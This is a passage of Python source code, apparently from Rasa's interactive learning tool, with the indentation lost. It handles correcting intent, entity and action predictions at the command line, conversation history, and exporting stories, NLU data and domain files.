if data.get("quick_replies"):
output += "\nQuick replies:"
for idx, element in enumerate(data.get("quick_replies")):
element_str = cli_utils.element_to_string(element, idx)
output += "\n" + element_str
return output
def latest_user_message(events: List[Dict[Text, Any]]) -> Optional[Dict[Text, Any]]:
"""Return most recent user message."""
for i, e in enumerate(reversed(events)):
if e.get("event") == UserUttered.type_name:
return e
return None
def all_events_before_latest_user_msg(
events: List[Dict[Text, Any]]
) -> List[Dict[Text, Any]]:
"""Return all events that happened before the most recent user message."""
for i, e in enumerate(reversed(events)):
if e.get("event") == UserUttered.type_name:
return events[: -(i + 1)]
return events
async def _ask_questions(
questions: Union[Form, Question],
conversation_id: Text,
endpoint: EndpointConfig,
is_abort: Callable[[Dict[Text, Any]], bool] = lambda x: False,
) -> Any:
"""Ask the user a question, if Ctrl-C is pressed provide user with menu."""
should_retry = True
answers = {}
while should_retry:
answers = questions.ask()
if answers is None or is_abort(answers):
should_retry = await _ask_if_quit(conversation_id, endpoint)
else:
should_retry = False
return answers
def _selection_choices_from_intent_prediction(
predictions: List[Dict[Text, Any]]
) -> List[Dict[Text, Any]]:
""""Given a list of ML predictions create a UI choice list."""
sorted_intents = sorted(predictions, key=lambda k: (-k["confidence"], k["name"]))
choices = []
for p in sorted_intents:
name_with_confidence = f'{p.get("confidence"):03.2f} {p.get("name"):40}'
choice = {"name": name_with_confidence, "value": p.get("name")}
choices.append(choice)
return choices
async def _request_free_text_intent(
conversation_id: Text, endpoint: EndpointConfig
) -> Text:
question = questionary.text(
message="Please type the intent name:",
validate=io_utils.not_empty_validator("Please enter an intent name"),
)
return await _ask_questions(question, conversation_id, endpoint)
async def _request_free_text_action(
conversation_id: Text, endpoint: EndpointConfig
) -> Text:
question = questionary.text(
message="Please type the action name:",
validate=io_utils.not_empty_validator("Please enter an action name"),
)
return await _ask_questions(question, conversation_id, endpoint)
async def _request_free_text_utterance(
conversation_id: Text, endpoint: EndpointConfig, action: Text
) -> Text:
question = questionary.text(
message=(
f"Please type the message for your new utterance " f"template '{action}':"
),
validate=io_utils.not_empty_validator("Please enter a template message"),
)
return await _ask_questions(question, conversation_id, endpoint)
async def _request_selection_from_intents(
intents: List[Dict[Text, Text]], conversation_id: Text, endpoint: EndpointConfig
) -> Text:
question = questionary.select("What intent is it?", choices=intents)
return await _ask_questions(question, conversation_id, endpoint)
async def _request_fork_point_from_list(
forks: List[Dict[Text, Text]], conversation_id: Text, endpoint: EndpointConfig
) -> Text:
question = questionary.select(
"Before which user message do you want to fork?", choices=forks
)
return await _ask_questions(question, conversation_id, endpoint)
async def _request_fork_from_user(
conversation_id, endpoint
) -> Optional[List[Dict[Text, Any]]]:
"""Take in a conversation and ask at which point to fork the conversation.
Returns the list of events that should be kept. Forking means, the
conversation will be reset and continued from this previous point."""
tracker = await retrieve_tracker(
endpoint, conversation_id, EventVerbosity.AFTER_RESTART
)
choices = []
for i, e in enumerate(tracker.get("events", [])):
if e.get("event") == UserUttered.type_name:
choices.append({"name": e.get("text"), "value": i})
fork_idx = await _request_fork_point_from_list(
list(reversed(choices)), conversation_id, endpoint
)
if fork_idx is not None:
return tracker.get("events", [])[: int(fork_idx)]
else:
return None
async def _request_intent_from_user(
latest_message, intents, conversation_id, endpoint
) -> Dict[Text, Any]:
"""Take in latest message and ask which intent it should have been.
Returns the intent dict that has been selected by the user."""
predictions = latest_message.get("parse_data", {}).get("intent_ranking", [])
predicted_intents = {p["name"] for p in predictions}
for i in intents:
if i not in predicted_intents:
predictions.append({"name": i, "confidence": 0.0})
# convert intents to ui list and add <other> as a free text alternative
choices = [
{"name": "<create_new_intent>", "value": OTHER_INTENT}
] + _selection_choices_from_intent_prediction(predictions)
intent_name = await _request_selection_from_intents(
choices, conversation_id, endpoint
)
if intent_name == OTHER_INTENT:
intent_name = await _request_free_text_intent(conversation_id, endpoint)
selected_intent = {"name": intent_name, "confidence": 1.0}
else:
# returns the selected intent with the original probability value
selected_intent = next(
(x for x in predictions if x["name"] == intent_name), {"name": None}
)
return selected_intent
async def _print_history(conversation_id: Text, endpoint: EndpointConfig) -> None:
"""Print information about the conversation for the user."""
tracker_dump = await retrieve_tracker(
endpoint, conversation_id, EventVerbosity.AFTER_RESTART
)
events = tracker_dump.get("events", [])
table = _chat_history_table(events)
slot_strings = _slot_history(tracker_dump)
print("------")
print("Chat History\n")
print(table)
if slot_strings:
print("\n")
print(f"Current slots: \n\t{', '.join(slot_strings)}\n")
print("------")
def _chat_history_table(events: List[Dict[Text, Any]]) -> Text:
"""Create a table containing bot and user messages.
Also includes additional information, like any events and
prediction probabilities."""
def wrap(txt: Text, max_width: int) -> Text:
return "\n".join(textwrap.wrap(txt, max_width, replace_whitespace=False))
def colored(txt: Text, color: Text) -> Text:
return "{" + color + "}" + txt + "{/" + color + "}"
def format_user_msg(user_event: UserUttered, max_width: int) -> Text:
intent = user_event.intent or {}
intent_name = intent.get("name", "")
_confidence = intent.get("confidence", 1.0)
_md = _as_md_message(user_event.parse_data)
_lines = [
colored(wrap(_md, max_width), "hired"),
f"intent: {intent_name} {_confidence:03.2f}",
]
return "\n".join(_lines)
def bot_width(_table: AsciiTable) -> int:
return _table.column_max_width(1)
def user_width(_table: AsciiTable) -> int:
return _table.column_max_width(3)
def add_bot_cell(data, cell):
data.append([len(data), Color(cell), "", ""])
def add_user_cell(data, cell):
data.append([len(data), "", "", Color(cell)])
# prints the historical interactions between the bot and the user,
# to help with correctly identifying the action
table_data = [
[
"# ",
Color(colored("Bot ", "autoblue")),
" ",
Color(colored("You ", "hired")),
]
]
table = SingleTable(table_data, "Chat History")
bot_column = []
tracker = DialogueStateTracker.from_dict("any", events)
applied_events = tracker.applied_events()
for idx, event in enumerate(applied_events):
if isinstance(event, ActionExecuted):
bot_column.append(colored(event.action_name, "autocyan"))
if event.confidence is not None:
bot_column[-1] += colored(f" {event.confidence:03.2f}", "autowhite")
elif isinstance(event, UserUttered):
if bot_column:
text = "\n".join(bot_column)
add_bot_cell(table_data, text)
bot_column = []
msg = format_user_msg(event, user_width(table))
add_user_cell(table_data, msg)
elif isinstance(event, BotUttered):
wrapped = wrap(format_bot_output(event), bot_width(table))
bot_column.append(colored(wrapped, "autoblue"))
else:
if event.as_story_string():
bot_column.append(wrap(event.as_story_string(), bot_width(table)))
if bot_column:
text = "\n".join(bot_column)
add_bot_cell(table_data, text)
table.inner_heading_row_border = False
table.inner_row_border = True
table.inner_column_border = False
table.outer_border = False
table.justify_columns = {0: "left", 1: "left", 2: "center", 3: "right"}
return table.table
def _slot_history(tracker_dump: Dict[Text, Any]) -> List[Text]:
"""Create an array of slot representations to be displayed."""
slot_strings = []
for k, s in tracker_dump.get("slots", {}).items():
colored_value = cli_utils.wrap_with_color(
str(s), color=rasa.cli.utils.bcolors.WARNING
)
slot_strings.append(f"{k}: {colored_value}")
return slot_strings
async def _write_data_to_file(conversation_id: Text, endpoint: EndpointConfig):
"""Write stories and nlu data to file."""
story_path, nlu_path, domain_path = _request_export_info()
tracker = await retrieve_tracker(endpoint, conversation_id)
events = tracker.get("events", [])
serialised_domain = await retrieve_domain(endpoint)
domain = Domain.from_dict(serialised_domain)
await _write_stories_to_file(story_path, events, domain)
await _write_nlu_to_file(nlu_path, events)
await _write_domain_to_file(domain_path, events, domain)
logger.info("Successfully wrote stories and NLU data")
async def _ask_if_quit(conversation_id: Text, endpoint: EndpointConfig) -> bool:
"""Display the exit menu.
Return `True` if the previous question should be retried."""
answer = questionary.select(
message="Do you want to stop?",
choices=[
Choice("Continue", "continue"),
Choice("Undo Last", "undo"),
Choice("Fork", "fork"),
Choice("Start Fresh", "restart"),
Choice("Export & Quit", "quit"),
],
).ask()
if not answer or answer == "quit":
# this is also the default answer if the user presses Ctrl-C
await _write_data_to_file(conversation_id, endpoint)
raise Abort()
elif answer == "continue":
# in this case we will just return, and the original
# question will get asked again
return True
elif answer == "undo":
raise UndoLastStep()
elif answer == "fork":
raise ForkTracker()
elif answer == "restart":
raise RestartConversation()
async def _request_action_from_user(
predictions: List[Dict[Text, Any]], conversation_id: Text, endpoint: EndpointConfig
) -> Tuple[Text, bool]:
"""Ask the user to correct an action prediction."""
await _print_history(conversation_id, endpoint)
choices = [
{
"name": f'{a.get("score"):03.2f} {a.get("action"):40}',
"value": a.get("action"),
}
for a in predictions
]
tracker = await retrieve_tracker(endpoint, conversation_id)
events = tracker.get("events", [])
session_actions_all = [a["name"] for a in _collect_actions(events)]
session_actions_unique = list(set(session_actions_all))
old_actions = [action["value"] for action in choices]
new_actions = [
{"name": action, "value": OTHER_ACTION + action}
for action in session_actions_unique
if action not in old_actions
]
choices = (
[{"name": "<create new action>", "value": NEW_ACTION}] + new_actions + choices
)
question = questionary.select("What is the next action of the bot?", choices)
action_name = await _ask_questions(question, conversation_id, endpoint)
is_new_action = action_name == NEW_ACTION
if is_new_action:
# create new action
action_name = await _request_free_text_action(conversation_id, endpoint)
if action_name.startswith(UTTER_PREFIX):
utter_message = await _request_free_text_utterance(
conversation_id, endpoint, action_name
)
NEW_TEMPLATES[action_name] = {utter_message: ""}
elif action_name[:32] == OTHER_ACTION:
# action was newly created in the session, but not this turn
is_new_action = True
action_name = action_name[32:]
print(f"Thanks! The bot will now run {action_name}.\n")
return action_name, is_new_action
def _request_export_info() -> Tuple[Text, Text, Text]:
"""Request file path and export stories & nlu data to that path"""
# export training data and quit
questions = questionary.form(
export_stories=questionary.text(
message="Export stories to (if file exists, this "
"will append the stories)",
default=PATHS["stories"],
validate=io_utils.file_type_validator(
[".md"],
"Please provide a valid export path for the stories, e.g. 'stories.md'.",
),
),
export_nlu=questionary.text(
message="Export NLU data to (if file exists, this will "
"merge learned data with previous training examples)",
default=PATHS["nlu"],
validate=io_utils.file_type_validator(
[".md", ".json"],
"Please provide a valid export path for the NLU data, e.g. 'nlu.md'.",
),
),
export_domain=questionary.text(
message="Export domain file to (if file exists, this "
"will be overwritten)",
default=PATHS["domain"],
validate=io_utils.file_type_validator(
[".yml", ".yaml"],
"Please provide a valid export path for the domain file, e.g. 'domain.yml'.",
),
),
)
answers = questions.ask()
if not answers:
raise Abort()
return answers["export_stories"], answers["export_nlu"], answers["export_domain"]
def _split_conversation_at_restarts(
events: List[Dict[Text, Any]]
) -> List[List[Dict[Text, Any]]]:
"""Split a conversation at restart events.
Returns an array of event lists, without the restart events."""
sub_conversations = []
current = []
for e in events:
if e.get("event") == "restart":
if current:
sub_conversations.append(current)
current = []
else:
current.append(e)
if current:
sub_conversations.append(current)
return sub_conversations
def _collect_messages(events: List[Dict[Text, Any]]) -> List[Message]:
"""Collect the message text and parsed data from the UserMessage events
into a list"""
import rasa.nlu.training_data.util as rasa_nlu_training_data_utils
messages = []
for event in events:
if event.get("event") == UserUttered.type_name:
data = event.get("parse_data", {})
rasa_nlu_training_data_utils.remove_untrainable_entities_from(data)
msg = Message.build(data["text"], data["intent"]["name"], data["entities"])
messages.append(msg)
elif event.get("event") == UserUtteranceReverted.type_name and messages:
messages.pop() # user corrected the nlu, remove incorrect example
return messages
def _collect_actions(events: List[Dict[Text, Any]]) -> List[Dict[Text, Any]]:
"""Collect all the `ActionExecuted` events into a list."""
return [evt for evt in events if evt.get("event") == ActionExecuted.type_name]
async def _write_stories_to_file(
export_story_path: Text, events: List[Dict[Text, Any]], domain: Domain
) -> None:
"""Write the conversation of the conversation_id to the file paths."""
sub_conversations = _split_conversation_at_restarts(events)
io_utils.create_path(export_story_path)
if os.path.exists(export_story_path):
append_write = "a" # append if already exists
else:
append_write = "w" # make a new file if not
with open(export_story_path, append_write, encoding=io_utils.DEFAULT_ENCODING) as f:
i = 1
for conversation in sub_conversations:
parsed_events = rasa.core.events.deserialise_events(conversation)
tracker = DialogueStateTracker.from_events(
f"interactive_story_{i}", evts=parsed_events, slots=domain.slots
)
if any(
isinstance(event, UserUttered) for event in tracker.applied_events()
):
i += 1
f.write("\n" + tracker.export_stories(SAVE_IN_E2E))
def _filter_messages(msgs: List[Message]) -> List[Message]:
"""Filter messages removing those that start with INTENT_MESSAGE_PREFIX"""
filtered_messages = []
for msg in msgs:
if not msg.text.startswith(INTENT_MESSAGE_PREFIX):
filtered_messages.append(msg)
return filtered_messages
async def _write_nlu_to_file(
export_nlu_path: Text, events: List[Dict[Text, Any]]
) -> None:
"""Write the nlu data of the conversation_id to the file paths."""
from rasa.nlu.training_data import TrainingData
msgs = _collect_messages(events)
msgs = _filter_messages(msgs)
# noinspection PyBroadException
try:
previous_examples = loading.load_data(export_nlu_path)
except Exception as e:
logger.debug(
f"An exception occurred while trying to load the NLU data. {str(e)}"
)
# No previous file exists, use empty training data as replacement.
previous_examples = TrainingData()
nlu_data = previous_examples.merge(TrainingData(msgs))
# need to guess the format of the file before opening it to avoid a read
# in a write
nlu_format = _get_nlu_target_format(export_nlu_path)
if nlu_format == MARKDOWN:
stringified_training_data = nlu_data.nlu_as_markdown()
else:
stringified_training_data = nlu_data.nlu_as_json()
io_utils.write_text_file(stringified_training_data, export_nlu_path)
def _get_nlu_target_format(export_path: Text) -> Text:
guessed_format = loading.guess_format(export_path)
if guessed_format not in {MARKDOWN, RASA}:
if export_path.endswith(".json"):
guessed_format = RASA
else:
guessed_format = MARKDOWN
return guessed_format
def _entities_from_messages(messages: List[Message]) -> List[Text]:
"""Return all entities that occur in at least one of the messages."""
return list({e["entity"] for m in messages for e in m.data.get("entities", [])})
def _intents_from_messages(messages: List[Message]) -> Set[Text]:
"""Return all intents that occur in at least one of the messages."""
# set of distinct intents
distinct_intents = {m.data["intent"] for m in messages if "intent" in m.data}
return distinct_intents
async def _write_domain_to_file(
domain_path: Text, events: List[Dict[Text, Any]], old_domain: Domain
) -> None:
"""Write an updated domain file to the file path."""
io_utils.create_path(domain_path)
messages = _collect_messages(events)
actions = _collect_actions(events)
templates = NEW_TEMPLATES # type: Dict[Text, List[Dict[Text, Any]]]
# TODO for now there is no way to distinguish between action and form
collected_actions = list(
{e["name"] for e in actions if e["name"] not in default_action_names()}
)
new_domain = Domain(
intents=_intents_from_messages(messages),
entities=_entities_from_messages(messages),
slots=[],
templates=templates,
action_names=collected_actions,
form_names=[],
)
old_domain.merge(new_domain).persist_clean(domain_path)
async def _predict_till_next_listen(
endpoint: EndpointConfig,
conversation_id: Text,
conversation_ids: List[Text],
plot_file: Optional[Text],
) -> None:
"""Predict and validate actions until we need to wait for a user message."""
listen = False
while not listen:
result = await request_prediction(endpoint, conversation_id)
predictions = result.get("scores")
probabilities = [prediction["score"] for prediction in predictions]
pred_out = int(np.argmax(probabilities))
action_name = predictions[pred_out].get("action")
policy = result.get("policy")
confidence = result.get("confidence")
await _print_history(conversation_id, endpoint)
await _plot_trackers(
conversation_ids,
plot_file,
endpoint,
unconfirmed=[ActionExecuted(action_name)],
)
listen = await _validate_action(
action_name, policy, confidence, predictions, endpoint, conversation_id
)
await _plot_trackers(conversation_ids, plot_file, endpoint)
tracker_dump = await retrieve_tracker(
endpoint, conversation_id, EventVerbosity.AFTER_RESTART
)
events = tracker_dump.get("events", [])
if len(events) >= 2:
last_event = events[-2] # last event before action_listen
# if bot message includes buttons the user will get a list choice to reply
# the list choice is displayed in place of action listen
if last_event.get("event") == BotUttered.type_name and last_event["data"].get(
"buttons", None
):
response = _get_button_choice(last_event)
if response != cli_utils.FREE_TEXT_INPUT_PROMPT:
await send_message(endpoint, conversation_id, response)
def _get_button_choice(last_event: Dict[Text, Any]) -> Text:
data = last_event["data"]
message = last_event.get("text", "")
choices = cli_utils.button_choices_from_message_data(
data, allow_free_text_input=True
)
question = questionary.select(message, choices)
response = cli_utils.payload_from_button_question(question)
return response
async def _correct_wrong_nlu(
corrected_nlu: Dict[Text, Any],
events: List[Dict[Text, Any]],
endpoint: EndpointConfig,
conversation_id: Text,
) -> None:
"""A wrong NLU prediction got corrected, update core's tracker."""
revert_latest_user_utterance = UserUtteranceReverted().as_dict()
# `UserUtteranceReverted` also removes the `ACTION_LISTEN` event before, hence we
# have to replay it.
listen_for_next_message = ActionExecuted(ACTION_LISTEN_NAME).as_dict()
corrected_message = latest_user_message(events)
if corrected_message is None:
raise Exception("Failed to correct NLU data. User message not found.")
corrected_message["parse_data"] = corrected_nlu
await send_event(
endpoint,
conversation_id,
[revert_latest_user_utterance, listen_for_next_message, corrected_message],
)
async def _correct_wrong_action(
corrected_action: Text,
endpoint: EndpointConfig,
conversation_id: Text,
is_new_action: bool = False,
) -> None:
"""A wrong action prediction got corrected, update core's tracker."""
await send_action(
endpoint, conversation_id, corrected_action, is_new_action=is_new_action
)
def _form_is_rejected(action_name: Text, tracker: Dict[Text, Any]) -> bool:
"""Check if the form got rejected with the most recent action name."""
return (
tracker.get("active_form", {}).get("name")
and action_name != tracker["active_form"]["name"]
and action_name != ACTION_LISTEN_NAME
)
def _form_is_restored(action_name: Text, tracker: Dict[Text, Any]) -> bool:
"""Check whether the form is called again after it was rejected."""
return (
tracker.get("active_form", {}).get("rejected")
and tracker.get("latest_action_name") == ACTION_LISTEN_NAME
and action_name == tracker.get("active_form", {}).get("name")
)
async def _confirm_form_validation(
action_name, tracker, endpoint, conversation_id
) -> None:
"""Ask a user whether an input for a form should be validated.
Previous to this call, the active form was chosen after it was rejected."""
requested_slot = tracker.get("slots", {}).get(REQUESTED_SLOT)
validation_questions = questionary.confirm(
f"Should '{action_name}' validate user input to fill "
f"the slot '{requested_slot}'?"
)
validate_input = await _ask_questions(
validation_questions, conversation_id, endpoint
)
if not validate_input:
# notify form action to skip validation
await send_event(
endpoint, conversation_id, {"event": "form_validation", "validate": False}
)
elif not tracker.get("active_form", {}).get("validate"):
# handle contradiction with learned behaviour
warning_question = questionary.confirm(
"ERROR: FormPolicy predicted no form validation "
"based on previous training stories. "
"Make sure to remove contradictory stories "
"from training data. "
"Otherwise predicting no form validation "
"will not work as expected."
)
await _ask_questions(warning_question, conversation_id, endpoint)
# notify form action to validate an input
await send_event(
endpoint, conversation_id, {"event": "form_validation", "validate": True}
)
async def _validate_action(
action_name: Text,
policy: Text,
confidence: float,
predictions: List[Dict[Text, Any]],
endpoint: EndpointConfig,
conversation_id: Text,
) -> bool:
"""Query the user to validate if an action prediction is correct.
Returns `True` if the prediction is correct, `False` otherwise."""
question = questionary.confirm(f"The bot wants to run '{action_name}', correct?")
is_correct = await _ask_questions(question, conversation_id, endpoint)
if not is_correct:
action_name, is_new_action = await _request_action_from_user(
predictions, conversation_id, endpoint
)
else:
is_new_action = False
tracker = await retrieve_tracker(
endpoint, conversation_id, EventVerbosity.AFTER_RESTART
)
if _form_is_rejected(action_name, tracker):
# notify the tracker that form was rejected
await send_event(
endpoint,
conversation_id,
{
"event": "action_execution_rejected",
"name": tracker["active_form"]["name"],
},
)
elif _form_is_restored(action_name, tracker):
await _confirm_form_validation(action_name, tracker, endpoint, conversation_id)
if not is_correct:
await _correct_wrong_action(
action_name, endpoint, conversation_id, is_new_action=is_new_action
)
else:
await send_action(endpoint, conversation_id, action_name, policy, confidence)
return action_name == ACTION_LISTEN_NAME
def _as_md_message(parse_data: Dict[Text, Any]) -> Text:
"""Display the parse data of a message in markdown format."""
from rasa.nlu.training_data.formats import MarkdownWriter
if parse_data.get("text", "").startswith(INTENT_MESSAGE_PREFIX):
return parse_data["text"]
if not parse_data.get("entities"):
parse_data["entities"] = []
return MarkdownWriter.generate_message_md(parse_data)
def _validate_user_regex(latest_message: Dict[Text, Any], intents: List[Text]) -> bool:
"""Validate if a users message input is correct.
This assumes the user entered an intent directly, e.g. using
`/greet`. Return `True` if the intent is a known one."""
parse_data = latest_message.get("parse_data", {})
intent = parse_data.get("intent", {}).get("name")
if intent in intents:
return True
else:
return False
async def _validate_user_text(
latest_message: Dict[Text, Any], endpoint: EndpointConfig, conversation_id: Text
) -> bool:
"""Validate a user message input as free text.
This assumes the user message is a text message (so NOT `/greet`)."""
parse_data = latest_message.get("parse_data", {})
text = _as_md_message(parse_data)
intent = parse_data.get("intent", {}).get("name")
entities = parse_data.get("entities", [])
if entities:
message = (
f"Is the intent '{intent}' correct for '{text}' and are "
f"all entities labeled correctly?"
)
else:
message = (
f"Your NLU model classified '{text}' with intent '{intent}'"
f" and there are no entities, is this correct?"
)
if intent is None:
print(f"The NLU classification for '{text}' returned '{intent}'")
return False
else:
question = questionary.confirm(message)
return await _ask_questions(question, conversation_id, endpoint)
async def _validate_nlu(
intents: List[Text], endpoint: EndpointConfig, conversation_id: Text
) -> None:
"""Validate if a user message, either text or intent is correct.
If the prediction of the latest user message is incorrect,
the tracker will be corrected with the correct intent / entities."""
tracker = await retrieve_tracker(
endpoint, conversation_id, EventVerbosity.AFTER_RESTART
)
latest_message = latest_user_message(tracker.get("events", [])) or {}
if latest_message.get("text", "").startswith( # pytype: disable=attribute-error
INTENT_MESSAGE_PREFIX
):
valid = _validate_user_regex(latest_message, intents)
else:
valid = await _validate_user_text(latest_message, endpoint, conversation_id)
if not valid:
corrected_intent = await _request_intent_from_user(
latest_message, intents, conversation_id, endpoint
)
# corrected intents have confidence 1.0
corrected_intent["confidence"] = 1.0
events = tracker.get("events", [])
entities = await _correct_entities(latest_message, endpoint, conversation_id)
corrected_nlu = {
"intent": corrected_intent,
"entities": entities,
"text": latest_message.get("text"),
}
await _correct_wrong_nlu(corrected_nlu, events, endpoint, conversation_id)
async def _correct_entities(
latest_message: Dict[Text, Any], endpoint: EndpointConfig, conversation_id: Text
) -> List[Dict[Text, Any]]:
"""Validate the entities of a user message.
Returns the corrected entities"""
from rasa.nlu.training_data.formats import MarkdownReader
parse_original = latest_message.get("parse_data", {})
entity_str = _as_md_message(parse_original)
question = questionary.text(
"Please mark the entities using [value](type) notation", default=entity_str
)
annotation = await _ask_questions(question, conversation_id, endpoint)
# noinspection PyProtectedMember
parse_annotated = MarkdownReader().parse_training_example(annotation)
corrected_entities = _merge_annotated_and_original_entities(
parse_annotated, parse_original
)
return corrected_entities
def _merge_annotated_and_original_entities(
parse_annotated: Message, parse_original: Dict[Text, Any]
) -> List[Dict[Text, Any]]:
# overwrite entities which have already been
# annotated in the original annotation to preserve
# additional entity parser information
entities = parse_annotated.get("entities", [])[:]
for i, entity in enumerate(entities):
for original_entity in parse_original.get("entities", []):
if _is_same_entity_annotation(entity, original_entity):
entities[i] = original_entity
break
return entities
def _is_same_entity_annotation(entity, other) -> Any:
return entity["value"] == other["value"] and entity["entity"] == other["entity"]
async def _enter_user_message(conversation_id: Text, endpoint: EndpointConfig) -> None:
"""Request a new message from the user."""
question = questionary.text("Your input ->")
message = await _ask_questions(question, conversation_id, endpoint, lambda a: not a)
if message == (INTENT_MESSAGE_PREFIX + constants.USER_INTENT_RESTART):
raise RestartConversation()
await send_message(endpoint, conversation_id, message)
async def is_listening_for_message(
conversation_id: Text, endpoint: EndpointConfig
) -> bool:
"""Check if the conversation is in need for a user message."""
tracker = await retrieve_tracker(endpoint, conversation_id, EventVerbosity.APPLIED)
for i, e in enumerate(reversed(tracker.get("events", []))):
if e.get("event") == UserUttered.type_name:
return False
elif e.get("event") == ActionExecuted.type_name:
return e.get("name") == ACTION_LISTEN_NAME
return False
async def _undo_latest(conversation_id: Text, endpoint: EndpointConfig) -> None:
"""Undo either the latest bot action or user message, whatever is last."""
tracker = await retrieve_tracker(endpoint, conversation_id, EventVerbosity.ALL)
# Get latest `UserUtterance` or `ActionExecuted` event.
last_event_type = None
for i, e in enumerate(reversed(tracker.get("events", []))):
last_event_type = e.get("event")
if last_event_type in {ActionExecuted.type_name, UserUttered.type_name}:
break
elif last_event_type == Restarted.type_name:
break
if last_event_type == ActionExecuted.type_name:
undo_action = ActionReverted().as_dict()
await send_event(endpoint, conversation_id, undo_action)
elif last_event_type == UserUttered.type_name:
undo_user_message = UserUtteranceReverted().as_dict()
listen_for_next_message = ActionExecuted(ACTION_LISTEN_NAME).as_dict()
await send_event(
endpoint, conversation_id, [undo_user_message, listen_for_next_message]
)
async def _fetch_events(
conversation_ids: List[Union[Text, List[Event]]], endpoint: EndpointConfig
) -> List[List[Event]]:
"""Retrieve all event trackers from the endpoint for all conversation ids."""
event_sequences = []
for conversation_id in conversation_ids:
if isinstance(conversation_id, str):
tracker = await retrieve_tracker(endpoint, conversation_id)
events = tracker.get("events", [])
for conversation in _split_conversation_at_restarts(events):
parsed_events = rasa.core.events.deserialise_events(conversation)
event_sequences.append(parsed_events)
else:
event_sequences.append(conversation_id)
return event_sequences
async def _plot_trackers(
conversation_ids: List[Union[Text, List[Event]]],
output_file: Optional[Text],
endpoint: EndpointConfig,
unconfirmed: Optional[List[Event]] = None,
) -> None:
"""Create a plot of the trackers of the passed conversation ids.
This assumes that the last conversation id is the conversation we are currently
working on. If there are events that are not part of this active tracker
yet, they can be passed as part of `unconfirmed`. They will be appended
to the currently active conversation."""
if not output_file or not conversation_ids:
# if there is no output file provided, we are going to skip plotting
# same happens if there are no conversation ids
return
event_sequences = await _fetch_events(conversation_ids, endpoint)
if unconfirmed:
event_sequences[-1].extend(unconfirmed)
graph = await visualize_neighborhood(
event_sequences[-1], event_sequences, output_file=None, max_history=2
)
from networkx.drawing.nx_pydot import write_dot
write_dot(graph, output_file)
def _print_help(skip_visualization: bool) -> None:
"""Print some initial help message for the user."""
if not skip_visualization:
visualization_url = DEFAULT_SERVER_FORMAT.format(
"http", DEFAULT_SERVER_PORT + 1
)
visualization_help = (
f"Visualisation at {visualization_url}/visualization.html ."
)
else:
visualization_help = ""
rasa.cli.utils.print_success(
f"Bot loaded. {visualization_help}\n"
f"Type a message and press enter "
f"(press 'Ctr-c' to exit)."
)
async def record_messages(
endpoint: EndpointConfig,
file_importer: TrainingDataImporter,
conversation_id: Text = UserMessage.DEFAULT_SENDER_ID,
max_message_limit: Optional[int] = None,
skip_visualization: bool = False,
) -> None:
"""Read messages from the command line and print bot responses."""
try:
try:
domain = await retrieve_domain(endpoint)
except ClientError:
logger.exception(
f"Failed to connect to Rasa Core server at '{endpoint.url}'. "
f"Is the server running?"
)
return
intents = [next(iter(i)) for i in (domain.get("intents") or [])]
num_messages = 0
if not skip_visualization:
events_including_current_user_id = await _get_tracker_events_to_plot(
domain, file_importer, conversation_id
)
plot_file = DEFAULT_STORY_GRAPH_FILE
await _plot_trackers(events_including_current_user_id, plot_file, endpoint)
else:
# `None` means that future `_plot_trackers` calls will also skip the
# visualization.
plot_file = None
events_including_current_user_id = []
_print_help(skip_visualization)
while not utils.is_limit_reached(num_messages, max_message_limit):
try:
if await is_listening_for_message(conversation_id, endpoint):
await _enter_user_message(conversation_id, endpoint)
await _validate_nlu(intents, endpoint, conversation_id)
await _predict_till_next_listen(
endpoint,
conversation_id,
events_including_current_user_id,
plot_file,
)
num_messages += 1
except RestartConversation:
await send_event(endpoint, conversation_id, Restarted().as_dict())
await send_event(
endpoint,
conversation_id,
ActionExecuted(ACTION_LISTEN_NAME).as_dict(),
)
logger.info("Restarted conversation, starting a new one.")
except UndoLastStep:
await _undo_latest(conversation_id, endpoint)
await _print_history(conversation_id, endpoint)
except ForkTracker:
await _print_history(conversation_id, endpoint)
events_fork = await _request_fork_from_user(conversation_id, endpoint)
await send_event(endpoint, conversation_id, Restarted().as_dict())
if events_fork:
for evt in events_fork:
await send_event(endpoint, conversation_id, evt)
logger.info("Restarted conversation at fork.")
await _print_history(conversation_id, endpoint)
await _plot_trackers(
events_including_current_user_id, plot_file, endpoint
)
except Abort:
return
except Exception:
logger.exception("An exception occurred while recording messages.")
raise
async def _get_tracker_events_to_plot(
domain: Dict[Text, Any], file_importer: TrainingDataImporter, conversation_id: Text,
) -> List[Union[Text, List[Event]]]:
training_trackers = await _get_training_trackers(file_importer, domain)
number_of_trackers = len(training_trackers)
if number_of_trackers > MAX_NUMBER_OF_TRAINING_STORIES_FOR_VISUALIZATION:
rasa.cli.utils.print_warning(
f"You have {number_of_trackers} different story paths in "
f"your training data. Visualizing them is very resource "
f"consuming. Hence, the visualization will only show the stories "
f"which you created during interactive learning, but not your "
f"training stories."
)
training_trackers = []
training_data_events = [t.events for t in training_trackers]
events_including_current_user_id = training_data_events + [conversation_id]
return events_including_current_user_id
async def _get_training_trackers(
file_importer: TrainingDataImporter, domain: Dict[str, Any]
) -> List[DialogueStateTracker]:
from rasa.core import training
return await training.load_data(
file_importer,
Domain.from_dict(domain),
augmentation_factor=0,
use_story_concatenation=False,
)
def _serve_application(
app: Sanic,
file_importer: TrainingDataImporter,
skip_visualization: bool,
conversation_id: Text,
) -> Sanic:
"""Start a core server and attach the interactive learning IO."""
endpoint = EndpointConfig(url=DEFAULT_SERVER_URL)
async def run_interactive_io(running_app: Sanic) -> None:
"""Small wrapper to shut down the server once cmd io is done."""
await record_messages(
endpoint=endpoint,
file_importer=file_importer,
skip_visualization=skip_visualization,
conversation_id=conversation_id,
)
logger.info("Killing Sanic server now.")
running_app.stop() # kill the sanic server
app.add_task(run_interactive_io)
update_sanic_log_level()
app.run(host="0.0.0.0", port=DEFAULT_SERVER_PORT)
return app
def start_visualization(image_path: Text = None) -> None:
"""Add routes to serve the conversation visualization files."""
app = Sanic(__name__)
# noinspection PyUnusedLocal
@app.exception(NotFound)
async def ignore_404s(request, exception):
return response.text("Not found", status=404)
# noinspection PyUnusedLocal
@app.route(VISUALIZATION_TEMPLATE_PATH, methods=["GET"])
def visualisation_html(request):
return response.file(visualization.visualization_html_path())
# noinspection PyUnusedLocal
@app.route("/visualization.dot", methods=["GET"])
def visualisation_png(request):
try:
headers = {"Cache-Control": "no-cache"}
return response.file(os.path.abspath(image_path), headers=headers)
except FileNotFoundError:
return response.text("", 404)
update_sanic_log_level()
app.run(host="0.0.0.0", port=DEFAULT_SERVER_PORT + 1, access_log=False)
# noinspection PyUnusedLocal
async def train_agent_on_start(
args, endpoints, additional_arguments, app, loop
) -> None:
